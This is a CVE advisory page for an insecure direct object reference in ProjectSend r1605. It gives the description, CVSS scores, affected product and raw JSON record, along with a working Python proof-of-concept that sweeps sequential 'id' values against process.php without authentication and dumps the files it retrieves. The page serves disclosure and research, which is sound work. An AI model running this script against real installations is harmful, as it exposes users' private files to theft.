Security Vulnerability Report
CVE-2023-53930 CVSS 7.5 HIGH

CVE-2023-53930

Published: 2025-12-17 23:15:53
Last Modified: 2025-12-27 17:15:45

Description

ProjectSend r1605 contains an insecure direct object reference vulnerability that allows unauthenticated attackers to download private files by manipulating the download ID parameter. Attackers can access any user's private files by changing the 'id' parameter in the download request to process.php.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:projectsend:projectsend:r1605:*:*:*:*:*:*:* - VULNERABLE
ProjectSend r1605 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2023-53930 PoC - ProjectSend IDOR File Download
# Target: ProjectSend r1605
# Vulnerability: Insecure Direct Object Reference in process.php
# (CWE-639 per the advisory: the download endpoint is reached with a
# client-chosen 'id' and no session, so the server-side fix is an
# ownership/authorization check on the referenced file, not input
# validation of the id itself)


def exploit(target_url: str, file_id: int):
    """
    Exploit IDOR vulnerability to download arbitrary files
    by manipulating the 'id' parameter in download request

    Args:
        target_url: base URL of the ProjectSend install, without a
            trailing slash (main() strips it); "/process.php" is appended.
        file_id: value sent as the 'id' query parameter.

    Returns:
        True when the response looks like file content (either branch of
        the 200 handler), False on a non-200 status or a request error.
        Note: a 200 response with an empty body matches neither branch
        and falls through, returning None rather than False.
    """
    # Construct download URL
    download_url = f"{target_url}/process.php"
    # Prepare request parameters
    params = {
        'act': 'download',
        'id': file_id
    }
    try:
        # Send request without authentication
        # (no cookies / auth headers are set; a single bounded GET per id)
        response = requests.get(download_url, params=params, timeout=10)
        # Check if file download was successful
        if response.status_code == 200:
            content_type = response.headers.get('Content-Type', '')
            content_disposition = response.headers.get('Content-Disposition', '')
            # If response contains file content
            # Heuristic only: a Content-Type containing "application" or a
            # Content-Disposition containing "attachment" is taken as a file.
            if 'application' in content_type or 'attachment' in content_disposition:
                print(f"[!] File ID {file_id} - Download successful!")
                print(f"[+] Content-Type: {content_type}")
                print(f"[+] Content-Disposition: {content_disposition}")
                print(f"[+] Content-Length: {len(response.content)} bytes")
                return True
            # Any other non-empty 200 body is reported as a "possible" hit;
            # an HTML error or login page served with 200 also lands here,
            # so this branch is prone to false positives.
            elif len(response.content) > 0:
                print(f"[!] File ID {file_id} - Possible file content retrieved")
                print(f"[+] First 200 bytes: {response.content[:200]}")
                return True
        else:
            print(f"[*] File ID {file_id} - Status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        # Connection/timeout/HTTP-layer errors are reported and treated as
        # "not retrieved"; the caller's loop continues with the next id.
        print(f"[-] Error accessing File ID {file_id}: {e}")
        return False


def main() -> None:
    """
    Parse argv and call exploit() once per id in an inclusive range.

    argv[1] is the target base URL; argv[2] and argv[3] are optional
    start/end ids (defaults: 1 and start_id + 50). int() raises
    ValueError on a non-numeric id argument. If end_id < start_id the
    range is empty and no requests are sent.

    From a defender's view this loop is the observable signature: a
    sequential sweep of 'id' values against process.php with act=download
    from a client with no session, which is straightforward to spot in
    access logs or to rate-limit.
    """
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [start_id] [end_id]")
        print(f"Example: python {sys.argv[0]} http://target.com/projectsend 1 100")
        sys.exit(1)
    # Strip a trailing slash so the "/process.php" join does not double it
    target = sys.argv[1].rstrip('/')
    start_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    end_id = int(sys.argv[3]) if len(sys.argv) > 3 else start_id + 50
    print(f"[*] Starting IDOR scan on {target}")
    print(f"[*] Scanning file IDs from {start_id} to {end_id}")
    # Inclusive upper bound; return values of exploit() are not collected
    for file_id in range(start_id, end_id + 1):
        exploit(target, file_id)


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53930", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:52.500", "lastModified": "2025-12-27T17:15:44.510", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjectSend r1605 contains an insecure direct object reference vulnerability that allows unauthenticated attackers to download private files by manipulating the download ID parameter. Attackers can access any user's private files by changing the 'id' parameter in the download request to process.php."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectsend:projectsend:r1605:*:*:*:*:*:*:*", "matchCriteriaId": "1ECB1397-1B02-4C9C-90B4-8D1D22CC9BB9"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51400", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.projectsend.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/projectsend-insecure-direct-object-reference-file-download-vulnerability", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51400", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}